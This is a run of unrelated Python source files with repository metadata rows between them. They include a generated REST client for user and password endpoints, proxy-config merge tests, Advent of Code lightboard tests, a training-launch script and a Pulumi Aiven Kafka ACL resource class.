:param User user: User update to apply (required)
:param str zap_trace_span: OpenTracing span context
:return: UserResponse
If the method is called asynchronously,
returns the request thread.
""" # noqa: E501
local_var_params = locals()
all_params = ['user_id', 'user', 'zap_trace_span'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
all_params.append('urlopen_kw')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_users_id" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'user_id' is set
if ('user_id' not in local_var_params or
local_var_params['user_id'] is None):
raise ValueError("Missing the required parameter `user_id` when calling `patch_users_id`") # noqa: E501
# verify the required parameter 'user' is set
if ('user' not in local_var_params or
local_var_params['user'] is None):
raise ValueError("Missing the required parameter `user` when calling `patch_users_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'user_id' in local_var_params:
path_params['userID'] = local_var_params['user_id'] # noqa: E501
query_params = []
header_params = {}
if 'zap_trace_span' in local_var_params:
header_params['Zap-Trace-Span'] = local_var_params['zap_trace_span'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'user' in local_var_params:
body_params = local_var_params['user']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
# urlopen optional setting
urlopen_kw = None
if 'urlopen_kw' in kwargs:
urlopen_kw = kwargs['urlopen_kw']
return self.api_client.call_api(
'/api/v2/users/{userID}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
urlopen_kw=urlopen_kw)
def post_users(self, user, **kwargs): # noqa: E501,D401,D403
"""Create a user.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_users(user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param User user: User to create (required)
:param str zap_trace_span: OpenTracing span context
:return: UserResponse
If the method is called asynchronously,
returns the request thread.
""" # noqa: E501
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.post_users_with_http_info(user, **kwargs) # noqa: E501
else:
(data) = self.post_users_with_http_info(user, **kwargs) # noqa: E501
return data
def post_users_with_http_info(self, user, **kwargs): # noqa: E501,D401,D403
"""Create a user.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_users_with_http_info(user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param User user: User to create (required)
:param str zap_trace_span: OpenTracing span context
:return: UserResponse
If the method is called asynchronously,
returns the request thread.
""" # noqa: E501
local_var_params = locals()
all_params = ['user', 'zap_trace_span'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
all_params.append('urlopen_kw')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_users" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'user' is set
if ('user' not in local_var_params or
local_var_params['user'] is None):
raise ValueError("Missing the required parameter `user` when calling `post_users`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'zap_trace_span' in local_var_params:
header_params['Zap-Trace-Span'] = local_var_params['zap_trace_span'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'user' in local_var_params:
body_params = local_var_params['user']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
# urlopen optional setting
urlopen_kw = None
if 'urlopen_kw' in kwargs:
urlopen_kw = kwargs['urlopen_kw']
return self.api_client.call_api(
'/api/v2/users', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
urlopen_kw=urlopen_kw)
def post_users_id_password(self, user_id, password_reset_body, **kwargs): # noqa: E501,D401,D403
"""Update a password.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_users_id_password(user_id, password_reset_body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user_id: The user ID. (required)
:param PasswordResetBody password_reset_body: New password (required)
:param str zap_trace_span: OpenTracing span context
:param str authorization: An auth credential for the Basic scheme
:return: None
If the method is called asynchronously,
returns the request thread.
""" # noqa: E501
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.post_users_id_password_with_http_info(user_id, password_reset_body, **kwargs) # noqa: E501
else:
(data) = self.post_users_id_password_with_http_info(user_id, password_reset_body, **kwargs) # noqa: E501
return data
def post_users_id_password_with_http_info(self, user_id, password_reset_body, **kwargs): # noqa: E501,D401,D403
"""Update a password.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_users_id_password_with_http_info(user_id, password_reset_body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user_id: The user ID. (required)
:param PasswordResetBody password_reset_body: New password (required)
:param str zap_trace_span: OpenTracing span context
:param str authorization: An auth credential for the Basic scheme
:return: None
If the method is called asynchronously,
returns the request thread.
""" # noqa: E501
local_var_params = locals()
all_params = ['user_id', 'password_reset_body', 'zap_trace_span', 'authorization'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
all_params.append('urlopen_kw')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_users_id_password" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'user_id' is set
if ('user_id' not in local_var_params or
local_var_params['user_id'] is None):
raise ValueError("Missing the required parameter `user_id` when calling `post_users_id_password`") # noqa: E501
# verify the required parameter 'password_reset_body' is set
if ('password_reset_body' not in local_var_params or
local_var_params['password_reset_body'] is None):
raise ValueError("Missing the required parameter `password_reset_body` when calling `post_users_id_password`") # noqa: E501
collection_formats = {}
path_params = {}
if 'user_id' in local_var_params:
path_params['userID'] = local_var_params['user_id'] # noqa: E501
query_params = []
header_params = {}
if 'zap_trace_span' in local_var_params:
header_params['Zap-Trace-Span'] = local_var_params['zap_trace_span'] # noqa: E501
if 'authorization' in local_var_params:
header_params['Authorization'] = local_var_params['authorization'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'password_reset_body' in local_var_params:
body_params = local_var_params['password_reset_body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['BasicAuthentication'] # noqa: E501
# urlopen optional setting
urlopen_kw = None
if 'urlopen_kw' in kwargs:
urlopen_kw = kwargs['urlopen_kw']
return self.api_client.call_api(
'/api/v2/users/{userID}/password', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
urlopen_kw=urlopen_kw)
def put_me_password(self, password_reset_body, **kwargs): # noqa: E501,D401,D403
"""Update a password.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.put_me_password(password_reset_body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param PasswordResetBody password_reset_body: New password (required)
:param str zap_trace_span: OpenTracing span context
:param str authorization: An auth credential for the Basic scheme
:return: None
If the method is called asynchronously,
returns the request thread.
""" # noqa: E501
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.put_me_password_with_http_info(password_reset_body, **kwargs) # noqa: E501
else:
(data) = self.put_me_password_with_http_info(password_reset_body, **kwargs) # noqa: E501
return data
def put_me_password_with_http_info(self, password_reset_body, **kwargs): # noqa: E501,D401,D403
"""Update a password.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.put_me_password_with_http_info(password_reset_body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param PasswordResetBody password_reset_body: New password (required)
:param str zap_trace_span: OpenTracing span context
:param str authorization: An auth credential for the Basic scheme
:return: None
If the method is called asynchronously,
returns the request thread.
""" # noqa: E501
local_var_params = locals()
all_params = ['password_reset_body', 'zap_trace_span', 'authorization'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
all_params.append('urlopen_kw')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method put_me_password" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'password_reset_body' is set
if ('password_reset_body' not in local_var_params or
local_var_params['password_reset_body'] is None):
raise ValueError("Missing the required parameter `password_reset_body` when calling `put_me_password`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'zap_trace_span' in local_var_params:
header_params['Zap-Trace-Span'] = local_var_params['zap_trace_span'] # noqa: E501
if 'authorization' in local_var_params:
header_params['Authorization'] = local_var_params['authorization'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'password_reset_body' in local_var_params:
body_params = local_var_params['password_reset_body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['BasicAuthentication'] # noqa: E501
# urlopen optional setting
urlopen_kw = None
if 'urlopen_kw' in kwargs:
urlopen_kw = kwargs['urlopen_kw']
return self.api_client.call_api(
'/api/v2/me/password', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
urlopen_kw=urlopen_kw)
| 40.608696
| 159
| 0.619963
| 4,998
| 41,096
| 4.796519
| 0.040816
| 0.053393
| 0.082927
| 0.02703
| 0.961498
| 0.958662
| 0.955992
| 0.946607
| 0.935386
| 0.930338
| 0
| 0.019665
| 0.290977
| 41,096
| 1,011
| 160
| 40.648863
| 0.803075
| 0.302171
| 0
| 0.818505
| 0
| 0.005338
| 0.189234
| 0.030102
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033808
| false
| 0.044484
| 0.005338
| 0
| 0.088968
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
81582e4396b3cbf99fad45a556d5af1b836029d4
| 42
|
py
|
Python
|
charq/__init_.py
|
EmidioLP/CharQ
|
7fb857c4481458ce5d09741d78bf0513d44af130
|
[
"MIT"
] | null | null | null |
charq/__init_.py
|
EmidioLP/CharQ
|
7fb857c4481458ce5d09741d78bf0513d44af130
|
[
"MIT"
] | 1
|
2021-03-16T19:11:36.000Z
|
2021-03-16T19:12:18.000Z
|
charq/__init_.py
|
EmidioLP/CharQ
|
7fb857c4481458ce5d09741d78bf0513d44af130
|
[
"MIT"
] | 2
|
2021-03-16T19:03:43.000Z
|
2021-03-16T20:10:11.000Z
|
from charq import CharAscii, WordGenerate
| 21
| 41
| 0.857143
| 5
| 42
| 7.2
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.119048
| 42
| 1
| 42
| 42
| 0.972973
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8169141dd580a2964c05f0d816b17d0367d761e2
| 2,001
|
py
|
Python
|
docker/tests/test_merge_config.py
|
OlegBravo/tf-charms
|
4b05c5bb82446b5625aa8fd1efc7f69c8962b62b
|
[
"Apache-2.0"
] | null | null | null |
docker/tests/test_merge_config.py
|
OlegBravo/tf-charms
|
4b05c5bb82446b5625aa8fd1efc7f69c8962b62b
|
[
"Apache-2.0"
] | null | null | null |
docker/tests/test_merge_config.py
|
OlegBravo/tf-charms
|
4b05c5bb82446b5625aa8fd1efc7f69c8962b62b
|
[
"Apache-2.0"
] | null | null | null |
import pytest
from lib.charms.layer.container_runtime_common import (
merge_config
)
def test_get_hosts():
CONFIG = {
'NO_PROXY': '192.168.2.1, 192.168.2.0/29, hello.com',
'https_proxy': 'https://hop.proxy',
'HTTP_PROXY': '',
}
ENVIRONMENT = {
'HTTPS_PROXY': 'https://proxy.hop',
'HTTP_PROXY': 'http://proxy.hop',
'no_proxy': 'not tha proxy'
}
merged = merge_config(CONFIG, ENVIRONMENT)
assert merged == {
'NO_PROXY': '192.168.2.1, 192.168.2.0/29, hello.com',
'HTTPS_PROXY': 'https://hop.proxy',
'HTTP_PROXY': 'http://proxy.hop',
'no_proxy': '192.168.2.1, 192.168.2.0/29, hello.com',
'https_proxy': 'https://hop.proxy',
'http_proxy': 'http://proxy.hop'
}
def test_get_hosts_no_local_conf():
CONFIG = {
'NO_PROXY': '',
'https_proxy': '',
'HTTP_PROXY': '',
}
ENVIRONMENT = {
'HTTPS_PROXY': 'https://proxy.hop',
'HTTP_PROXY': 'http://proxy.hop',
'no_proxy': 'not tha proxy'
}
merged = merge_config(CONFIG, ENVIRONMENT)
assert merged == {
'HTTPS_PROXY': 'https://proxy.hop',
'HTTP_PROXY': 'http://proxy.hop',
'NO_PROXY': 'not tha proxy',
'https_proxy': 'https://proxy.hop',
'http_proxy': 'http://proxy.hop',
'no_proxy': 'not tha proxy'
}
def test_get_hosts_no_env_conf():
ENVIRONMENT = {
'NO_PROXY': '',
'HTTPS_PROXY': '',
'HTTP_PROXY': '',
}
CONFIG = {
'HTTPS_PROXY': 'https://proxy.hop',
'HTTP_PROXY': 'http://proxy.hop',
'no_proxy': 'not tha proxy'
}
merged = merge_config(CONFIG, ENVIRONMENT)
assert merged == {
'HTTPS_PROXY': 'https://proxy.hop',
'HTTP_PROXY': 'http://proxy.hop',
'NO_PROXY': 'not tha proxy',
'no_proxy': 'not tha proxy',
'https_proxy': 'https://proxy.hop',
'http_proxy': 'http://proxy.hop',
}
| 25.653846
| 61
| 0.54073
| 240
| 2,001
| 4.283333
| 0.15
| 0.183852
| 0.190661
| 0.157588
| 0.874514
| 0.84144
| 0.804475
| 0.804475
| 0.804475
| 0.804475
| 0
| 0.037113
| 0.272864
| 2,001
| 77
| 62
| 25.987013
| 0.669416
| 0
| 0
| 0.65625
| 0
| 0.046875
| 0.433283
| 0
| 0
| 0
| 0
| 0
| 0.046875
| 1
| 0.046875
| false
| 0
| 0.03125
| 0
| 0.078125
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8176e753ed558bb763c9a9bcd3ce4e228bdb9a8c
| 3,698
|
py
|
Python
|
AdventOfCode/Day18_tests.py
|
btrzcinski/AdventOfCode
|
46012e81ba8a56cde811ad481ab14b43ce73f09f
|
[
"MIT"
] | null | null | null |
AdventOfCode/Day18_tests.py
|
btrzcinski/AdventOfCode
|
46012e81ba8a56cde811ad481ab14b43ce73f09f
|
[
"MIT"
] | null | null | null |
AdventOfCode/Day18_tests.py
|
btrzcinski/AdventOfCode
|
46012e81ba8a56cde811ad481ab14b43ce73f09f
|
[
"MIT"
] | null | null | null |
import unittest
import Day18
class Day18_tests(unittest.TestCase):
def test_lightboard_neighbors(self):
l = Day18.Lightboard(6)
l[3,3] = 1
for point in [(2,2), (2, 3), (2, 4), (3, 2), (3, 4), (4, 2), (4, 3), (4, 4)]:
self.assertEqual(1, l.neighbors_on_for_light(point))
def test_example(self):
l = Day18.Lightboard(6)
l[0,1] = 1
l[0,3] = 1
l[0,5] = 1
l[1,3] = 1
l[1,4] = 1
l[2,0] = 1
l[2,5] = 1
l[3,2] = 1
l[4,0] = 1
l[4,2] = 1
l[4,5] = 1
l[5,0] = 1
l[5,1] = 1
l[5,2] = 1
l[5,3] = 1
self.assertEqual(".#.#.#\n...##.\n#....#\n..#...\n#.#..#\n####..", repr(l))
l.iterate()
self.assertEqual("..##..\n..##.#\n...##.\n......\n#.....\n#.##..", repr(l))
l.iterate()
self.assertEqual("..###.\n......\n..###.\n......\n.#....\n.#....", repr(l))
l.iterate()
self.assertEqual("...#..\n......\n...#..\n..##..\n......\n......", repr(l))
l.iterate()
self.assertEqual("......\n......\n..##..\n..##..\n......\n......", repr(l))
def test_example_with_stuck_corners(self):
l = Day18.Lightboard(6)
l[0,0] = 1
l[0,1] = 1
l[0,3] = 1
l[0,5] = 1
l[1,3] = 1
l[1,4] = 1
l[2,0] = 1
l[2,5] = 1
l[3,2] = 1
l[4,0] = 1
l[4,2] = 1
l[4,5] = 1
l[5,0] = 1
l[5,1] = 1
l[5,2] = 1
l[5,3] = 1
l[5,5] = 1
self.assertEqual("##.#.#\n...##.\n#....#\n..#...\n#.#..#\n####.#", repr(l))
l.iterate(corners_always_on=True)
self.assertEqual("#.##.#\n####.#\n...##.\n......\n#...#.\n#.####", repr(l))
l.iterate(corners_always_on=True)
self.assertEqual("#..#.#\n#....#\n.#.##.\n...##.\n.#..##\n##.###", repr(l))
l.iterate(corners_always_on=True)
self.assertEqual("#...##\n####.#\n..##.#\n......\n##....\n####.#", repr(l))
l.iterate(corners_always_on=True)
self.assertEqual("#.####\n#....#\n...#..\n.##...\n#.....\n#.#..#", repr(l))
l.iterate(corners_always_on=True)
self.assertEqual("##.###\n.##..#\n.##...\n.##...\n#.#...\n##...#", repr(l))
self.assertEqual(17, l.number_of_lights_on())
def test_example_with_stuck_corners_2(self):
l = Day18.Lightboard(6)
l[0,0] = 1
l[0,1] = 1
l[0,3] = 1
l[0,5] = 1
l[1,3] = 1
l[1,4] = 1
l[2,0] = 1
l[2,5] = 1
l[3,2] = 1
l[4,0] = 1
l[4,2] = 1
l[4,5] = 1
l[5,0] = 1
l[5,1] = 1
l[5,2] = 1
l[5,3] = 1
l[5,5] = 1
self.assertEqual("##.#.#\n...##.\n#....#\n..#...\n#.#..#\n####.#", repr(l))
l.iterate(n=5, corners_always_on=True)
self.assertEqual("##.###\n.##..#\n.##...\n.##...\n#.#...\n##...#", repr(l))
self.assertEqual(17, l.number_of_lights_on())
def test_example_with_stuck_corners_3(self):
l = Day18.Lightboard(6)
l[0,1] = 1
l[0,3] = 1
l[0,5] = 1
l[1,3] = 1
l[1,4] = 1
l[2,0] = 1
l[2,5] = 1
l[3,2] = 1
l[4,0] = 1
l[4,2] = 1
l[4,5] = 1
l[5,0] = 1
l[5,1] = 1
l[5,2] = 1
l[5,3] = 1
self.assertEqual(".#.#.#\n...##.\n#....#\n..#...\n#.#..#\n####..", repr(l))
l.iterate(n=5, corners_always_on=True)
self.assertEqual("##.###\n.##..#\n.##...\n.##...\n#.#...\n##...#", repr(l))
self.assertEqual(17, l.number_of_lights_on())
if __name__ == "__main__":
unittest.main(verbosity=2)
| 31.07563
| 85
| 0.380206
| 569
| 3,698
| 2.379613
| 0.073814
| 0.090103
| 0.099705
| 0.088626
| 0.85229
| 0.85229
| 0.813885
| 0.813885
| 0.813885
| 0.813885
| 0
| 0.094716
| 0.309086
| 3,698
| 118
| 86
| 31.338983
| 0.435225
| 0
| 0
| 0.810811
| 0
| 0
| 0.188751
| 0.186587
| 0
| 0
| 0
| 0
| 0.171171
| 1
| 0.045045
| false
| 0
| 0.018018
| 0
| 0.072072
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
819d31d4b9fccf11ef441015552aeaed172ce3da
| 540
|
py
|
Python
|
train_mosmed_timm-regnetx_002_posterize.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
train_mosmed_timm-regnetx_002_posterize.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
train_mosmed_timm-regnetx_002_posterize.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
import os
ls=["python main.py --configs configs/train_mosmed_unetplusplus_timm-regnetx_002_fold0_posterize.yml",
"python main.py --configs configs/train_mosmed_unetplusplus_timm-regnetx_002_fold1_posterize.yml",
"python main.py --configs configs/train_mosmed_unetplusplus_timm-regnetx_002_fold2_posterize.yml",
"python main.py --configs configs/train_mosmed_unetplusplus_timm-regnetx_002_fold3_posterize.yml",
"python main.py --configs configs/train_mosmed_unetplusplus_timm-regnetx_002_fold4_posterize.yml",
]
for l in ls:
os.system(l)
| 49.090909
| 102
| 0.846296
| 80
| 540
| 5.3375
| 0.3
| 0.117096
| 0.140515
| 0.222482
| 0.850117
| 0.850117
| 0.850117
| 0.850117
| 0.850117
| 0.850117
| 0
| 0.039293
| 0.057407
| 540
| 11
| 103
| 49.090909
| 0.799607
| 0
| 0
| 0
| 0
| 0
| 0.878004
| 0.64695
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.111111
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
c4afee20912d4f3ccdb0481399a4c02d1db91ea0
| 16,792
|
py
|
Python
|
sdk/python/pulumi_aiven/kafka_acl.py
|
pulumi/pulumi-aiven
|
0d330ef43c17ce2d2a77588c1d9754de6c8ca736
|
[
"ECL-2.0",
"Apache-2.0"
] | 7
|
2019-11-28T22:30:11.000Z
|
2021-12-27T16:40:54.000Z
|
sdk/python/pulumi_aiven/kafka_acl.py
|
pulumi/pulumi-aiven
|
0d330ef43c17ce2d2a77588c1d9754de6c8ca736
|
[
"ECL-2.0",
"Apache-2.0"
] | 97
|
2019-12-17T09:58:57.000Z
|
2022-03-31T15:19:02.000Z
|
sdk/python/pulumi_aiven/kafka_acl.py
|
pulumi/pulumi-aiven
|
0d330ef43c17ce2d2a77588c1d9754de6c8ca736
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2020-11-24T12:22:38.000Z
|
2020-11-24T12:22:38.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['KafkaAclArgs', 'KafkaAcl']
@pulumi.input_type
class KafkaAclArgs:
def __init__(__self__, *,
permission: pulumi.Input[str],
project: pulumi.Input[str],
service_name: pulumi.Input[str],
topic: pulumi.Input[str],
username: pulumi.Input[str]):
"""
The set of arguments for constructing a KafkaAcl resource.
:param pulumi.Input[str] permission: is the level of permission the matching users are given to the matching
topics (admin, read, readwrite, write).
:param pulumi.Input[str] project: and `service_name` - (Required) define the project and service the ACL belongs to.
They should be defined using reference as shown above to set up dependencies correctly.
These properties cannot be changed once the service is created. Doing so will result in
the topic being deleted and new one created instead.
:param pulumi.Input[str] service_name: Service to link the Kafka ACL to
:param pulumi.Input[str] topic: is a topic name pattern the ACL entry matches to.
:param pulumi.Input[str] username: is a username pattern the ACL entry matches to.
"""
pulumi.set(__self__, "permission", permission)
pulumi.set(__self__, "project", project)
pulumi.set(__self__, "service_name", service_name)
pulumi.set(__self__, "topic", topic)
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def permission(self) -> pulumi.Input[str]:
"""
is the level of permission the matching users are given to the matching
topics (admin, read, readwrite, write).
"""
return pulumi.get(self, "permission")
@permission.setter
def permission(self, value: pulumi.Input[str]):
pulumi.set(self, "permission", value)
@property
@pulumi.getter
def project(self) -> pulumi.Input[str]:
"""
and `service_name` - (Required) define the project and service the ACL belongs to.
They should be defined using reference as shown above to set up dependencies correctly.
These properties cannot be changed once the service is created. Doing so will result in
the topic being deleted and new one created instead.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: pulumi.Input[str]):
pulumi.set(self, "project", value)
@property
@pulumi.getter(name="serviceName")
def service_name(self) -> pulumi.Input[str]:
"""
Service to link the Kafka ACL to
"""
return pulumi.get(self, "service_name")
@service_name.setter
def service_name(self, value: pulumi.Input[str]):
pulumi.set(self, "service_name", value)
@property
@pulumi.getter
def topic(self) -> pulumi.Input[str]:
"""
is a topic name pattern the ACL entry matches to.
"""
return pulumi.get(self, "topic")
@topic.setter
def topic(self, value: pulumi.Input[str]):
pulumi.set(self, "topic", value)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
is a username pattern the ACL entry matches to.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@pulumi.input_type
class _KafkaAclState:
def __init__(__self__, *,
permission: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
service_name: Optional[pulumi.Input[str]] = None,
topic: Optional[pulumi.Input[str]] = None,
username: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering KafkaAcl resources.
:param pulumi.Input[str] permission: is the level of permission the matching users are given to the matching
topics (admin, read, readwrite, write).
:param pulumi.Input[str] project: and `service_name` - (Required) define the project and service the ACL belongs to.
They should be defined using reference as shown above to set up dependencies correctly.
These properties cannot be changed once the service is created. Doing so will result in
the topic being deleted and new one created instead.
:param pulumi.Input[str] service_name: Service to link the Kafka ACL to
:param pulumi.Input[str] topic: is a topic name pattern the ACL entry matches to.
:param pulumi.Input[str] username: is a username pattern the ACL entry matches to.
"""
if permission is not None:
pulumi.set(__self__, "permission", permission)
if project is not None:
pulumi.set(__self__, "project", project)
if service_name is not None:
pulumi.set(__self__, "service_name", service_name)
if topic is not None:
pulumi.set(__self__, "topic", topic)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def permission(self) -> Optional[pulumi.Input[str]]:
"""
is the level of permission the matching users are given to the matching
topics (admin, read, readwrite, write).
"""
return pulumi.get(self, "permission")
@permission.setter
def permission(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "permission", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
and `service_name` - (Required) define the project and service the ACL belongs to.
They should be defined using reference as shown above to set up dependencies correctly.
These properties cannot be changed once the service is created. Doing so will result in
the topic being deleted and new one created instead.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@property
@pulumi.getter(name="serviceName")
def service_name(self) -> Optional[pulumi.Input[str]]:
"""
Service to link the Kafka ACL to
"""
return pulumi.get(self, "service_name")
@service_name.setter
def service_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service_name", value)
@property
@pulumi.getter
def topic(self) -> Optional[pulumi.Input[str]]:
"""
is a topic name pattern the ACL entry matches to.
"""
return pulumi.get(self, "topic")
@topic.setter
def topic(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "topic", value)
@property
@pulumi.getter
def username(self) -> Optional[pulumi.Input[str]]:
"""
is a username pattern the ACL entry matches to.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "username", value)
class KafkaAcl(pulumi.CustomResource):
@overload
